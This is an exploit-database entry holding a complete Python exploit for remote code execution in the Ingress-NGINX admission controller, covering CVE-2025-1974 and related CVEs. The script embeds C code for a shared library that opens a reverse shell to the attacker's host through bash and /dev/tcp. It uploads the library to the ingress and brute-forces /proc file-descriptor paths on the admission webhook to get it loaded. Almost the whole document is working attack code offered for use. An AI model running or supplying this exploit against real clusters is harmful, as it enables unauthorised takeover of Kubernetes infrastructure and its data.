Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE



EKU-ID: 56334 CVE: CVE-2025-24514;CVE-2025-1974;CVE-2025-1098;CVE-2025-1097 OSVDB-ID:
Author: Beatriz Fresno Naumova Published: 2026-02-04 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title:  Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE
# Date: 2025-10-07
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://kubernetes.io
# Software Link: https://github.com/kubernetes/ingress-nginx
# Version: Affects v1.10.0 to v1.11.1 (potentially others)
# Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster
# CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974

import os
import sys
import socket
import requests
import threading
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# --- Embedded malicious shared object template ---
MALICIOUS_C_TEMPLATE = """
#include <stdlib.h>

__attribute__((constructor))
void run_on_load() {
    system("bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'");
}

int bind(void *e, const char *id) {
    return 1;
}

void ENGINE_load_evil() {}

int bind_engine() {
    return 1;
}
"""

def compile_shared_library(host, port, output_file="evil_engine.so"):
    c_code = MALICIOUS_C_TEMPLATE.replace("HOST", host).replace("PORT", str(port))

    with open("evil_engine.c", "w") as f:
        f.write(c_code)

    print("[*] Compiling malicious shared object...")
    result = os.system("gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto")

    if result == 0:
        print("[+] Shared object compiled successfully.")
        return True
    else:
        print("[!] Compilation failed. Is gcc installed?")
        return False


def send_brute_request(admission_url, json_template, proc, fd):
    print(f"[*] Trying /proc/{proc}/fd/{fd}")
    path = f"proc/{proc}/fd/{fd}"
    payload = json_template.replace("REPLACE", path)

    headers = {"Content-Type": "application/json"}
    url = admission_url.rstrip("/") + "/admission"

    try:
        response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5)
        print(f"[+] Response for /proc/{proc}/fd/{fd}: {response.status_code}")
    except Exception as e:
        print(f"[!] Error on /proc/{proc}/fd/{fd}: {e}")


def brute_force_admission(admission_url, json_file="review.json", max_proc=50, max_fd=30, max_workers=5):
    try:
        with open(json_file, "r") as f:
            json_data = f.read()
    except FileNotFoundError:
        print(f"[!] Error: {json_file} not found.")
        return

    print("[*] Starting brute-force against the admission webhook...")
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        for proc in range(1, max_proc):
            for fd in range(3, max_fd):
                executor.submit(send_brute_request, admission_url, json_data, proc, fd)


def upload_shared_library(ingress_url, shared_object="evil_engine.so"):
    try:
        with open(shared_object, "rb") as f:
            evil_payload = f.read()
    except FileNotFoundError:
        print(f"[!] Error: {shared_object} not found.")
        return

    parsed = urlparse(ingress_url)
    host = parsed.hostname
    port = parsed.port or 80
    path = parsed.path or "/"

    try:
        sock = socket.create_connection((host, port))
    except Exception as e:
        print(f"[!] Failed to connect to {host}:{port}: {e}")
        return

    fake_length = len(evil_payload) + 10
    headers = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: qmx-ingress-exploiter\r\n"
        f"Content-Type: application/octet-stream\r\n"
        f"Content-Length: {fake_length}\r\n"
        f"Connection: keep-alive\r\n\r\n"
    ).encode("iso-8859-1")

    print("[*] Uploading malicious shared object to ingress...")
    sock.sendall(headers + evil_payload)

    response = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk

    print("[*] Server response:\n")
    print(response.decode(errors="ignore"))
    sock.close()


def main():
    if len(sys.argv) != 4:
        print("Usage: python3 exploit.py <ingress_url> <admission_webhook_url> <rev_host:port>")
        sys.exit(1)

    ingress_url = sys.argv[1]
    admission_url = sys.argv[2]
    rev_host_port = sys.argv[3]

    if ':' not in rev_host_port:
        print("[!] Invalid format for rev_host:port.")
        sys.exit(1)

    host, port = rev_host_port.split(":")

    if not compile_shared_library(host, port):
        sys.exit(1)

    # Send the malicious shared object and keep the connection open
    upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,))
    upload_thread.start()

    # Simultaneously brute-force the admission webhook for valid file descriptors
    brute_force_admission(admission_url)


if __name__ == "__main__":
    main()